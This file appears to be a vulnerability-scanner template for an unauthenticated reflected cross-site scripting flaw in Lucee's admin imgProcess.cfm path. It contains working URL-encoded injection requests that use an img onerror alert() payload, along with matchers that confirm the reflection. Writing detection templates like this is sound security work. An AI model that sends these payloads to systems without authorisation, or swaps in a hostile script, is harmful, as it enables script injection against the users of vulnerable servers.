id: lucee-xss

info:
  name: Lucee Unauthenticated Reflected XSS
  author: incogbyte
  severity: medium
  description: A vulnerability in Lucee allows remote attackers to inject arbitrary Javascript into the responses returned by the server.
  tags: lucee,xss

requests:
  - method: GET
    path:
      - "{{BaseURL}}/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('{{randstr}}')%3elujb7/admin/imgProcess.cfm"
      - "{{BaseURL}}/lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('{{randstr}}')%3elujb7/admin/imgProcess.cfm"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<img src=a onerror=alert('{{randstr}}')>"
          - "MissingIncludeException"
          - "lucee-err"
        part: body
        condition: and